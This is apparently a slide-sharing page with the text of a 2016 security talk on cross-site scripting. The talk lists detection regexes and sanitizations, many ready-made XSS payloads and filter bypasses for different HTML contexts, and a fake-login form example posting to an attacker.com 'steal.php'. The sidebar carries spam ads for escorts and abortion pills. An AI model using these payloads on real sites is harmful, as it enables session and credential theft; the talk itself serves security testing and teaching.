Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024The Digital Insurer
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 

Dernier (20)

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

Non-Esoteric XSS Tips & Tricks

  • 1. Non-Esoteric XSSNon-Esoteric XSS Tips & TricksTips & Tricks Miroslav Štampar (mstampar@zsis.hr; miroslav@sqlmap.org) Non-Esoteric XSSNon-Esoteric XSS Tips & TricksTips & Tricks Miroslav Štampar (mstampar@zsis.hr; miroslav@sqlmap.org)
  • 2. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 2 XSS (Cross-Site Scripting)XSS (Cross-Site Scripting) Injection attack against usersagainst users of (otherwise) benign and trusted web sites Used mostly in targetedtargeted attacks (e.g. spear- phishing against administrators) For example, an attacker can send a link with malicious JavascriptJavascript (JS) code to an unsuspecting user The user’s browser has no way to know that the link should not be trusted and will execute the JS blindly – effectively giving access to cookies, session tokens or other sensitive information within browsing contextwithin browsing context
  • 3. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 3 Real-world (known) casesReal-world (known) cases
  • 4. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 4 More about vulnerabilityMore about vulnerability Considered as criticalcritical vulnerability, hence (often) well paid in bug bounty programs Failure to (properly) sanitize/filtersanitize/filter any of: <, >, ', " inside the response can introduce the vulnerability While testing, responses for user supplied values are being inspected for signs of the vulnerability (e.g. response returning values in originaloriginal form) Provoking JS pop-up boxpop-up box with custom message (e.g. XSS) is universally accepted as a Proof of Concept (PoC) for existence of vulnerability Types: storedstored (persisting), reflectedreflected (temporary) and DOM-basedDOM-based (in-browser)
  • 5. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 5 Food for thought :)Food for thought :)
  • 6. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 6 Testing workflowTesting workflow 1) Find reflecting inputinput points (e.g. page's GET parameter values) 2) Recognize contextcontext of reflection (e.g. inside <script>...</script>) 3) BypassBypass sanitization/filtering and/or protection mechanism(s) (Note: if possible and/or required) 4) Write vulnerability exploitation PoCPoC (e.g. ...alert('XSS')...)
  • 7. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 7 Practical example (PoC)Practical example (PoC)
  • 8. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 8 Protection mechanism(s)Protection mechanism(s) Common (XSS) detection regular expressions: ● /<[a­z]/i - (e.g.) <svg, <img - though, there are cases where “benign” tags as <a> are left un- blacklisted ● /b(java)?scriptb/i - (e.g.) <script, <img  src="javascript:, etc. ● /bonw+s*=/i - (e.g.) <img src=null onerror=... - though, there are cases where <marquee's onstart( is left un-blacklisted ● /bsrcs*=/i - (e.g.) <embed src=..., etc. ● /bw+(/i - (e.g.) alert( - though, there are cases where confirm( is left un-blacklisted
  • 9. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 9 Sanitization mechanism(s)Sanitization mechanism(s) Common (XSS) server response sanitizations: ● Removing all special characters - (e.g.) foo<'">bar → foobar ● Replacing with whitespace all special characters - (e.g.) foo<'">bar → foo bar ● HTML named entity encoding - (e.g.) foo<'">bar → foo&lt;&apos;&quot;&gt;bar ● HTML numeric code point encoding - (e.g.) foo<'">bar → foo&#60;&#39;&#34;&#62;bar ● Backslash escaping all special characters - (e.g.) foo<'">bar → foo<'">bar (Note: <script>) ● Uppercase conversion - (e.g.) foo<'">bar → FOO'"BAR (combined with another mechanism(s))
  • 10. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 10 Break-out of <tag...> context with > OR onXXX event handler injection ?vuln="><svg onload=alert(/XSS/)> ?vuln=" onclick="alert(/XSS/) Usability is highly dependent on context and available <tag> events (e.g.) Tags having visibility: hidden require breaking out of <tag...> context <tag...><tag...> ((|more|more))
  • 11. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 11 <tag...><tag...> ((|more|more)) Even though attacker's options inside <tag> are pretty narrowed (e.g. user interaction required), (ab)using CSS with style can help ?vuln=" onmouseover=alert(/XSS/)  style="display: block; position: absolute;  left: 0; top: 0; height: 10000px; width:  10000px; opacity: 0; cursor: default
  • 12. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 12 >...<>...< Injecting outside of <tag> context and/or scope (e.g. </script>...) requires unfiltered < and > Proper “Content­type” (e.g. “text/html”) is required, as in all XSS (reflected) cases (e.g. “application/json” is of no interest) ?vuln=<img src=null onerror=alert(/XSS/)> ?vuln=<script>alert(/XSS/)</script>
  • 13. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 13 <!­­...­­><!­­...­­> Requires breaking-out of <!­­...­­> (i.e. HTML comment) context with ­­> Common for (custom) sites with debugging support turned ON (e.g. returning used SQL query inside comment) ?vuln=­­><svg onload=alert(/XSS/)> As it explicitly requires usage of <tag> it is fairly common to end up as unexploitable (e.g. protections are trigger happy on occurrence(s) of <[a­zA­Z] inside parameter values)
  • 14. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 14 <frame ...><frame ...> Injecting custom <frame> OR onload event handler injection (prefered) ?vuln="><frame  src="data:text/html;base64,PHNjcmlwdD5hbGVy dCgnWFNTJyk8L3NjcmlwdD4 ?vuln=" onload="alert(/XSS/) Note: Non-<frame> tags can't be used because of <frameset> restrictions
  • 15. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 15 <iframe...><iframe...> Break-out of <iframe...> context OR onload event handler injection (prefered) ?vuln="></iframe><svg onload=alert( /XSS/)> ?vuln=" onload="alert(/XSS/)
  • 16. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 16 <input...><input...> Break-out of <input...> context with > OR  onfocus event handler injection (prefered) ?vuln=1"><svg onload=alert(/XSS/)> ?vuln=1" autofocus onfocus="alert(/XSS/)
  • 17. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 17 <input type<input type="hidden"="hidden"...>...> In hidden <input> cases, combined with inability to break-out of <input...> context (due to filtering of <>), regular onXXX event handler injection doesn't work Though, accesskey attribute can be (ab)used to make the user-assisted XSS payload (Alt­ Shift­<key>) ?vuln=" accesskey="X" onclick="alert(  /XSS/)
  • 18. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 18 <script>...</script><script>...</script> Break-out of <script>...</script> with </script> OR in-place JS injection (prefered) ?vuln=</script><svg onload=alert(/XSS/)> ?vuln=foobar');alert('XSS');var dummy=(' Common in third-party advertisement plugins Note: In-place JS injection doesn't require <>, though it requires unfiltered ' or " in majority of cases (interpreter syntax checksinterpreter syntax checks)
  • 19. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 19 echo $_SERVER['PHP_SELF']echo $_SERVER['PHP_SELF'] Common finding even on top sites and/or frameworks Non-sanitized reference of current script's path http://...php/"><svg onload="alert(/XSS/) Not PHP-specific (though more common) Note: JS injection in path often require manual URL encoding of non-alphanumeric characters
  • 20. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 20 <meta><meta> Often mislooked, though easy to exploit Top sites tend to utilize lots of metadata ?vuln="><script>alert(/XSS/)</script> ?vuln=0;url=data:text/html;base64,  PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4"  http­equiv="refresh
  • 21. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 21 <textarea> <textarea> andand <title> <title> Injection into <textarea> and <title> enclosings require explicit (respectable) closing tagsclosing tags (i.e. </textarea> and </title>) Important to note because of automatized scanners (majority don't check the context) <style> is also problematic, though in case of Internet Explorer CSS expression can be (ab)used ?vuln=</textarea><svg onload=alert(/XSS/)>
  • 22. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 22 $_POST$_POST Though not exploitable directly from link (i.e. address bar), it is a perfectly valid attack point Requires malicious HTMLmalicious HTML document that has to be loaded inside the victim's web browser Either a standalone HTML OR a link that points to the attacker's site hosting the HTML document
  • 23. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 23 Protection(s) bypasses (Protection(s) bypasses (|more|more)) <svg/onload=alert(/XSS/)> prompt`XSS` onerror=confirm;throw/XSS/; document.write(String.fromCharCode(60,  115,99,114,105,112,116,62,97,... [][(![]+[])[+[]]+([![]]+[][... // JSFuck <SCRIPT SRC=//DOMAIN.COM/XSS.JS></SCRIPT> <embed src=data:image/svg+xml;base64, PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cuM... <object data=data:text/html;base64,... <video/poster/onerror=alert(/XSS/)> </i/style=left:expression(alert('XSS'))>
  • 24. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 24 Protection(s) bypasses (Protection(s) bypasses (|more|more)) <iframe src=javascript:alert('XSS')> <isindex type=submit formaction=&#106 &#97&#118&#97&#115&#99&#114&#105&#112... <isindex type=image src=null  onerror=alert(/XSS/)> <iframe/srcdoc=&lt;svg&sol;onload&equals; alert&lpar;&quot;XSS&quot;&rpar;&gt;> <img src=null  onerror=u0061u006cu0065u0072u0074&lpar ;&quot;u0058u0053u0053&quot;&rpar;> <body style=height:9999px  onwheel=prompt(/XSS/)> <marquee onstart=confirm(/XSS/)>
  • 25. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 25 In cases when Javascript injection (i.e. XSS) is not possible, HTML injection is also a valid attack point – though, not as valuable Most common scenario is the usage of protection mechanism(s), while lacking any sanitization/filtering whatsoever “Evil link” scenario – (e.g.) “Fake login” scenario – (e.g.) <form action="//www.attacker.com/steal.php">... “Fake defacement” scenario – (e.g.) <h1>This site has been hacked by l33tcr3w</h1> p.s. HTML injectionp.s. HTML injection
  • 26. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 26 www.openbugbounty.org html5sec.org p.p.s. Recommended resourcesp.p.s. Recommended resources
  • 27. FSec – FOI 2016, Varaždin (Croatia) September 15th, 2016 27 Questions?Questions?